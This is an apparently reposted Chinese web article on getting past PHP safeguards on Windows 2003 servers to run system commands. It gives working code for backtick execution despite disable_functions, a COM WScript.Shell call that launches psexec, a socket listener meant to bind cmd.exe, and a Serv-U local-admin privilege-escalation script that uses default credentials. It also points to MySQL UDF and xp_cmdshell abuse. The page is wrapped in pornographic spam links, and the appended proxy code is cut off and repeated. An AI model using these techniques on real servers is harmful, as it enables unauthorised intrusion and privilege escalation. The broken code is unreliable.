亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 服務器 > Web服務器 > 正文

win2003 PHP服務器的突破新思路

2024-09-01 13:46:16
字體:
來源:轉載
供稿:網友
在WIN2000中, 一個普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也無法用system() 等函數執行系統命令, 但是我們還能用com()函數進行突破;到WIN 2003,即使IIS 和PHP都是默認安裝,你用system(), com()也可能拿它沒轍。這時候你就不得不使用一些新的方法來進行突破了。
  1、disable_functions的突破
  在php -4.0.1以上的版本,php.ini里引入了一項功能disable_functions , 這個功能比較有用,可以用它禁止一些函數。比如在php.ini里加上disable_functions = passthru exec system popen 那么在執行這些函數的時候將會提示Warning: system() has been disabled for security reasons,同時程序終止運行。但是也不是沒有辦法執行系統命令了。因為php采用了很多perl的特性,比如還可以用(`)來執行命令,示例代碼如下:
  <?$output = `ls -al`;echo "<pre>$output</pre>";?>
  據說這個只有設成safe_mode為on才能避免,但上次我在一臺國外的服務器上使用的時候還是失敗了,人并不是什么時候都能那么走運的:)
  2、dl()函數的應用
  當任何PHP的內部命令執行數和''都無法使用的時候,可以嘗試dl(),該方法只能用于safe mode=off, 因為它在安全模式下是被禁用的。利用dl()你可以直接調用W32api 函數,可惜這個擴展已被移動到 PECL 庫中,且自PHP 5.1.0以下版本起不再被綁定。以下是手冊里的例子:
  // 加載此擴展
  dl("php_w32api.dll");
  // 注冊 GetTickCount 函數,來自 kernel32.dll
  w32api_register_function("kernel32.dll",
  "GetTickCount",
  "long");
  // 注冊 MessageBoxA 函數,來自 User32.dll
  w32api_register_function("User32.dll",
  "MessageBoxA",
  "long");
  // 取得開機時間信息
  $ticks = GetTickCount();
  // 轉換為易于理解的文本
  $secs = floor($ticks / 1000);
  $mins = floor($secs / 60);
  $hours = floor($mins / 60);
  $str = sprintf("You have been using your computer for:".
  "/r/n %d Milliseconds, or /r/n %d Seconds".
  "or /r/n %d mins or/r/n %d hours %d mins.",
  $ticks,
  $secs,
  $mins,
  $hours,
  $mins - ($hours*60));
  // 顯示一個消息對話框,只有一個 OK 按鈕和上面的開機時間文本
  MessageBoxA(NULL,
  $str,
  "Uptime Information",
  MB_OK);
  ?>
  可惜我還沒有理解透徹dl()和W32api, 所以就不亂舉例子了, 免得誤導讀者。
  3、COM 和 .Net(Windows)函數的應用
  COM(Component Object Model,組件對象模型)是微軟開發的軟件規范,它用于開發面向對象的、編譯好的軟件組件,它允許把軟件抽象成為二進制的部件,主要運用于windows平臺。
  PHP 的 Windows 版本已經內置該擴展模塊的支持。無需加載任何附加擴展庫即可使用COM函數。它的使用方法類似于C++或Java中類的創建的語法,并把COM的類名作為參數傳遞到構造函數。例如使用在PHP中調用“WScript.Shell”執行系統命令:
  $cmd=” E:/cert/admin/psexec.exe”;
  if($com=new COM("WScript.Shell")) echo "yes";
  if(!$cmd1=$com->exec($cmd))
  {
  echo "can not exec()";
  }
  if(!$cmd2=$cmd1->stdout())
  {
  echo "can not stdout()";
  }
  if(!$cmd3=$cmd2->readall())
  {
  echo "can not readall()";
  }
  echo $cmd3;
  ?>
  圖1是我寫的一個執行psexec.exe的一個例子。
  這段代碼與ASP的的意思是一模一樣的,當然,你也可以像ASP那樣調用“ADODB.Connection”,利用這個組件結合jet2溢出漏洞,可能能夠在PHP Saft mode=ON下拿到一個Shell。
  //create the database connection
  $conn = new COM("ADODB.Connection");
  $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
  $conn->Open($dsn);
  //pull the data through SQL string
  $rs = $conn->Execute("select clients from web");
  …..
  ?>
  .Net 函數只能運行在 PHP 5上,當然,它需要 “.Net runtime”的支持,而且這的PHP的一個實驗性模塊,功能還未齊全,所以在這就不討論了。
  4、Java()函數的應用
  該方法適用于safe mode=on。要使用JAVA模塊服務器必須事先安裝Java虛擬機,而且在PHP安裝配置的時候打開了with-java的選項,代碼如下:
  [JAVA]
  ;這是到php_java.jar的路徑
  ;java.class.path = ./php_java.jar
  ;JDK的路徑
  ;Java.home = f:/jdk1.3.0
  ;到虛擬機的路徑
  ;Java.library=f:/jdk1.3.0/jre/bin/hostspot/jvm.dll
  同COM一樣,使用Java創建類(不僅僅是JavaBeans)只需把JAVA的類名作為參數傳遞到構造函數。以下是手冊里邊的一個例子:
  // This example is only intended to be run as a CGI.
  $frame = new Java('java.awt.Frame', 'PHP');
  $button = new Java('java.awt.Button', 'Hello Java World!');
  $frame->add('North', $button);
  $frame->validate();
  $frame->pack();
  $frame->visible = True;
  $thread = new Java('java.lang.Thread');
  $thread->sleep(10000);
  $frame->dispose();
  ?>
  可惜能真正支持JAVA的PHP服務器并不多見,所以在這也不多討論了。
  5、socket()函數的應用
  socket 是PHP中功能極為強大的一個模塊,如果你使用高級的、抽象的接口(由fsockopen()和psockopen函數打開的socket),是不需要打開“php_sockets.dll”的。但是如果要使用完整的socket函數塊,就必須在php.ini這樣設置:
  ;Windows Extensions
  ;Note that MySQL and ODBC support is now built in, so no dll is needed for it.
  ……..
  ;去掉以下一句最前邊的分號
  ;extension=php_sockets.dll
  使用PHP的socket函數塊可以實現端口轉發/重定向、數據包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 還可以用它構造TCP/UDP服務器, 同時, 我覺得它也是突破服務器安全策略的一個最好的辦法。以下便是一個在服務器上打開端口構造TCP服務器的例子,你可以用它來捆綁上服務器的cmd.exe:
  //在服務器上構造TCP服務
  //該例子需要php_sockets.dll的支持
  //執行后便可使用” telnet 127.0.0.1 1020”連接
  error_reporting(E_ALL);
  /* Allow the script to hang around waiting for connections. */
  set_time_limit(0);
  /* Turn on implicit output flushing so we see what we're getting
  * as it comes in. */
  ob_implicit_flush();
  //在服務器上綁定IP和端口
  $address = '127.0.0.1';
  $port = 1020;
  if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
  echo "socket_create() failed: reason: " . socket_strerror($sock) . "/n";
  }
  if (($ret = socket_bind($sock, $address, $port)) < 0) {
  echo "socket_bind() failed: reason: " . socket_strerror($ret) . "/n";
  }
  if (($ret = socket_listen($sock, 5)) < 0) {
  echo "socket_listen() failed: reason: " . socket_strerror($ret) . "/n";
  }
  do {
  if (($msgsock = socket_accept($sock)) < 0) {
  echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "/n";
  break;
  }
  /* Send instructions. */
  $msg = "/nWelcome to the PHP Test Server. /n" .
  "To quit, type 'quit'. To shut down the server type 'shutdown'./n";
  socket_write($msgsock, $msg, strlen($msg));
  do {
  if (false === socket_recv($msgsock, $buf , 1024, 0)) {
  echo "socket_read() failed: reason: " . socket_strerror($ret) . "/n";
  break 2;
  }
  if (!$buf = trim($buf)) {
  continue;
  }
  if ($buf == 'quit') {
  break;
  }
  if ($buf == 'shutdown') {
  socket_close($msgsock);
  break 2;
  }
  $talkback = "PHP: You said '$buf'./n";
  socket_write($msgsock, $talkback, strlen($talkback));
  echo "$buf/n";
  //以下處理接受到的buf
  /*eg:例如
  $buf=”cmd.exe /c netstat –an”;
  $pp = popen('$buf ', 'r');
  While($read = fgets($pp, 2096))
  echo $read;
  pclose($pp);
  */
  } while (true);
  socket_close($msgsock);
  } while (true);
  socket_close($sock);
  ?>
  事實上,很多主機都是沒有加載php_sockets.dll的,慶幸的是,不需要socket模塊支持的“fsockopen”函數已經足夠我們使用了。因為只要有“fsockopen”,我們便可以自由地讀寫本機中未對外部開放的端口。使用fsockopen讀寫serv-u 的本地管理端口43958 (注: 該端口無法在外部連結) 進行提權便是一個很典型的例子:
  $adminuser=” LocalAdministrator”;
  $adminpass=” #l@$ak#.lk;0@P”;
  $adminport=” 43958”;
  $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
  if (!$fp) {
  echo "$errstr ($errno)
  /n";
  } else {
  //可以寫入$shellcode
  // fputs ($fp, $shellcode);
  fputs ($fp, "USER ".$adminuser."/r/n");
  sleep (1);
  fputs ($fp, "PASS ".$adminpass."/r/n");
  sleep (1);
  fputs ($fp, "SITE MAINTENANCE/r/n");
  sleep (1);
  fputs ($fp, "-SETUSERSETUP/r/n");
  fputs ($fp, "-IP=".$addr."/r/n");
  fputs ($fp, "-PortNo=".$ftpport."/r/n");
  fputs ($fp, "-User=".$user."/r/n");
  fputs ($fp, "-Password=".$password."/r/n");
  fputs ($fp, "-HomeDir=".$homedir."/r/n");
  fputs ($fp, "-LoginMesFile=/r/n");
  fputs ($fp, "-Disable=0/r/n");
  fputs ($fp, "-RelPaths=0/r/n");
  fputs ($fp, "-NeedSecure=0/r/n");
  fputs ($fp, "-HideHidden=0/r/n");
  fputs ($fp, "-AlwaysAllowLogin=0/r/n");
  fputs ($fp, "-ChangePassword=1/r/n");
  fputs ($fp, "-QuotaEnable=0/r/n");
  fputs ($fp, "-MaxUsersLoginPerIP=-1/r/n");
  fputs ($fp, "-SpeedLimitUp=-1/r/n");
  fputs ($fp, "-SpeedLimitDown=-1/r/n");
  fputs ($fp, "-MaxNrUsers=-1/r/n");
  fputs ($fp, "-IdleTimeOut=600/r/n");
  fputs ($fp, "-SessionTimeOut=-1/r/n");
  fputs ($fp, "-Expire=0/r/n");
  fputs ($fp, "-RatioUp=1/r/n");
  fputs ($fp, "-RatioDown=1/r/n");
  fputs ($fp, "-RatiosCredit=0/r/n");
  fputs ($fp, "-QuotaCurrent=0/r/n");
  fputs ($fp, "-QuotaMaximum=0/r/n");
  fputs ($fp, "-Maintenance=System/r/n");
  fputs ($fp, "-PasswordType=Regular/r/n");
  fputs ($fp, "-Ratios=None/r/n");
  fputs ($fp, " Access=".$homedir."|RWAMELCDP/r/n");
  fputs ($fp, "QUIT/r/n");
  sleep (1);
  while (!feof($fp)) {
  echo fgets ($fp,128);
  }
  }
  ?>
  還可以利用fsockopen編寫HTTP代理,從而訪問外網或本機中無法外部訪問的網站。我手上有一個完整的HTTPProxy(圖4),代碼較長。有興趣的讀者可以看看。
  6、MYSQL/MSSQL接口
  不同于linux的是,windows下的mysql/MSSQL一般是以系統管理員身份運行的,因此,只要能拿到本機SQL數據庫中的root/sa密碼,你就可以直接用PHP連接數據庫來執行系統命令。
  在Mysql中執行系統命令要利用用戶自定義函數“MySQL UDF Dynamic Library”這個漏洞。在MSSQL中只要連接上數據庫,就能直接調用“master..xp_cmdshell“擴展執行命令,權限當然是system權限。
  總結一下:由于系統、IIS、PHP的版本不一樣,以上提到的幾個突破方法可能會有所變化,PHP還有許多擴展功能是可以利用的,走出system()那幾個系統命令執行函數,你就有可能突破系統安全策略的限制!
  后面附上proxy.php的代碼
  error_reporting(E_ALL);
  /*
  // This program is free software; you can redistribute it and/or
  // modify it under the terms of the GNU General Public License
  // as published by the Free Software Foundation; either version 2
  // of the License, or (at your option) any later version.
  //
  // This program is distributed in the hope that it will be useful,
  // but WITHOUT ANY WARRANTY; without even the implied warranty of
  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  // GNU General Public License for more details.
  //
  // You should have received a copy of the GNU General Public License
  // along with this program; if not, write to the Free Software
  // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  //-------------------------------------------------------------------
  // Class: PHProxy
  // Author: ultimategamer00 (Abdullah A.)
  // Last Modified: 6:28 PM 6/22/2004
  */
  function __stripslashes($str)
  {
  return get_magic_quotes_gpc() ? stripslashes($str) : $str;
  }
  if (!function_exists('str_rot13'))
  {
  function str_rot13($str)
  {
  static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
  'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');
  return strtr($str, $alpha[0], $alpha[1]);
  }
  }
  class PHProxy
  {
  var $allowed_hosts = array();
  var $version;
  var $script_url;
  var $url;
  var $url_segments;
  var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
  var $socket;
  var $content_type;
  var $request_headers;
  var $post_body;
  var $response_headers;
  var $response_body;
  function PHProxy($flags = 'previous')
  {
  $this->version = '0.2';
  $this->script_url = 'http'
  . (isset(
  function set_request_headers()
  {
  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0/r/n";
  $headers .= "Host: :/r/n";
  $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)/r/n";
  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1/r/n";
  $headers .= "Connection: close/r/n";
  if ($this->flags['show_referer'] == 1)
  {
  $headers .= "Referer: /r/n";
  }
  $cookies = $this->get_cookies();
  $headers .= $cookies != '' ? "Cookie: $cookies/r/n" : '';
  if (
  function set_request_headers()
  {
  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0/r/n";
  $headers .= "Host: :/r/n";
  $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)/r/n";
  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1/r/n";
  $headers .= "Connection: close/r/n";
  if ($this->flags['show_referer'] == 1)
  {
  $headers .= "Referer: /r/n";
  }
  $cookies = $this->get_cookies();
  $headers .= $cookies != '' ? "Cookie: $cookies/r/n" : '';
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
国产精品三级美女白浆呻吟| 精品少妇一区二区30p| 国产亚洲视频在线| 亚洲一级黄色片| 欧美中文字幕视频在线观看| 成人国产精品一区二区| 亚洲免费电影一区| 91精品国产综合久久久久久久久| 精品国偷自产在线视频99| 国产成人一区二区三区电影| 欧美亚洲在线视频| 日韩精品中文字幕在线播放| 日本在线精品视频| 日韩成人激情影院| 亚洲国产精品专区久久| 亚洲精品自拍偷拍| 欧美日韩国产91| 久久久999精品免费| 91久久精品国产91久久| 久久久精品视频成人| 国产精品高潮呻吟久久av野狼| 日本高清视频精品| 国产午夜精品全部视频在线播放| 91高清免费在线观看| 欧美日韩亚洲视频| 国产手机视频精品| 美女国内精品自产拍在线播放| 在线观看中文字幕亚洲| 国产一区二区三区在线| 久久久亚洲成人| 欧美日韩成人黄色| 国产精品久久久久久久久久小说| 国产亚洲人成a一在线v站| 亚洲亚裔videos黑人hd| 久热精品在线视频| 日韩av电影在线播放| 亚洲伊人成综合成人网| 亚洲伊人久久综合| 国产免费一区二区三区在线能观看| 国产99视频在线观看| 98精品国产自产在线观看| 日韩欧美在线视频免费观看| 欧美性高潮床叫视频| 久久久亚洲影院你懂的| 97香蕉超级碰碰久久免费的优势| 亚洲性生活视频在线观看| 日韩av手机在线观看| 91中文字幕在线观看| 国产日韩在线看| 国产免费一区二区三区在线能观看| 国产精品视频免费在线观看| 全色精品综合影院| 亚洲精品美女在线观看播放| 久久6精品影院| 亚州成人av在线| 日韩视频在线免费观看| xxxx欧美18另类的高清| 日韩中文字幕第一页| 欧美成人免费va影院高清| 久久久精品免费| 欧美精品国产精品日韩精品| 欧美高清视频免费观看| 日韩精品亚洲视频| 亚洲一区二区三区毛片| 欧美精品videossex88| 疯狂蹂躏欧美一区二区精品| 国产精品视频久| 亚洲影视九九影院在线观看| 97av在线播放| 亚洲成人av在线| 欧美成人精品一区二区三区| 色偷偷av亚洲男人的天堂| 欧美日韩激情网| 中文字幕久久久| 久久久免费高清电视剧观看| 日韩av综合网站| 欧美激情一二区| 日韩av片电影专区| 国产精品久久久久av免费| 成人免费福利在线| 亚洲黄色av女优在线观看| 国产精品网站入口| 欧美日韩亚洲一区二区| 中文字幕亚洲一区在线观看| 欧美成人精品h版在线观看| 日韩视频在线免费观看| 欧美伊久线香蕉线新在线| 成人久久久久久久| 国产成人鲁鲁免费视频a| 色婷婷成人综合| 国产欧美 在线欧美| 理论片在线不卡免费观看| 欧美性生交xxxxx久久久| 福利视频一区二区| 欧美肥婆姓交大片| 欧美日韩亚洲系列| 国产精品视频在线播放| 亚洲第一天堂av| 精品久久久免费| 日韩精品在线免费观看| 精品中文字幕视频| 超薄丝袜一区二区| 91精品久久久久久久久久| 亚洲日本成人女熟在线观看| 一区二区三区美女xx视频| 亚洲成人av在线播放| 国产成人精品免高潮费视频| 中文字幕欧美在线| 97香蕉久久超级碰碰高清版| 国产精品久久久久久久久借妻| 7m第一福利500精品视频| 98精品在线视频| 日本欧美一级片| 在线播放国产精品| 91在线免费观看网站| 精品久久久久久久久久国产| 欧美激情视频一区二区三区不卡| 日韩女优人人人人射在线视频| 精品久久久久久久久久ntr影视| 精品国产一区二区三区久久狼5月| 久久精品国产亚洲| 热re99久久精品国产66热| 91理论片午午论夜理片久久| 日韩激情视频在线| 欧洲亚洲免费在线| 精品视频偷偷看在线观看| 日本欧美黄网站| 精品在线欧美视频| 91精品国产综合久久久久久久久| 欧美中文字幕视频| 国内精品在线一区| 91久久在线观看| 中文字幕欧美日韩精品| 久久大大胆人体| 欧美理论片在线观看| 久久免费精品日本久久中文字幕| 欧美成人精品h版在线观看| 国产亚洲视频中文字幕视频| 欧美大人香蕉在线| 成人黄色片在线| 久久久免费精品| 自拍偷拍亚洲区| 久久影院免费观看| 欧洲成人午夜免费大片| 亚洲第一福利视频| 中文字幕自拍vr一区二区三区| 国产精品爱啪在线线免费观看| 久久亚洲综合国产精品99麻豆精品福利| 在线日韩中文字幕| 精品无人区太爽高潮在线播放| 色婷婷成人综合| 国产精品久久久久久久久久久不卡| 久久天天躁狠狠躁老女人| 成人网在线免费看| 亚洲精品98久久久久久中文字幕| 日韩精品免费在线视频观看| 亚洲精品一区二区久| 亚洲精品影视在线观看| 国产精品白嫩初高中害羞小美女| 国产精品亚洲美女av网站| 九九九久久久久久| 亚洲欧美日韩国产成人| 久久久97精品| 欧美性jizz18性欧美|